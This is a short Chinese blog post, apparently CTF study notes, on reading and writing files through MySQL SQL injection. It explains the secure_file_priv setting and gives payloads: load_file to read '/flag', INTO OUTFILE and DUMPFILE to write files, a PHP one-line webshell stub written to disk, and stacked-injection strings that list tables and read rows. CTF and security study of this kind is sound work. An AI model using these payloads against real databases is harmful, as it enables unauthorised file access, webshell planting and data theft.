[mysql][sql注入]读写文件

最新推荐文章于 2023-09-12 11:51:06 发布

捞氘河水怪

最新推荐文章于 2023-09-12 11:51:06 发布

阅读量256

点赞数 1

分类专栏： ctf sql注入文章标签： mysql sql 数据库

本文链接：https://blog.csdn.net/qq_37301470/article/details/121313798

版权

ctf 同时被 2 个专栏收录

42 篇文章 2 订阅

订阅专栏

sql注入

14 篇文章 0 订阅

订阅专栏

secure_file_priv 全局变量

mysql> show variables like "%secure_file%"
    -> ;
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv | NULL  |
+------------------+-------+
1 row in set, 1 warning (0.00 sec)

参数限制 load data ,select … outfile , load_file()传到那个目录

null         不允许导入导出
/tmp/       只能传到该目录下
空           可以任意传

mysql读文件

select load_file('/flag');
select convert(load_file("/flag") using utf8);

mysql写文件

outfile
dumpfile

select 'a\naaa\raaa' into outfile '/tmp/1.txt';
select 'a\naa\raaa' into dumpfile "1.txt";

一句话木马
select "<?php phpinfo();?>" into outfile "tmp/1.php";

=========================================

当secure_file_priv 为NULL

使用堆叠注入

条件:如果支持多语句执行的情况
multi_query($sql)

1';use database();show tables;#
1';use database();show columns from 'table1' ;#
1'handler 'table1' open as h1;handler h1 read first#

捞氘河水怪

关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
[mysql][sql注入]读写文件

secure_file_priv 全局变量mysql> show variables like "%secure_file%" -> ;+------------------+-------+| Variable_name | Value |+------------------+-------+| secure_file_priv | NULL |+------------------+-------+1 row in set, 1 warning (0.00
复制链接

扫一扫

专栏目录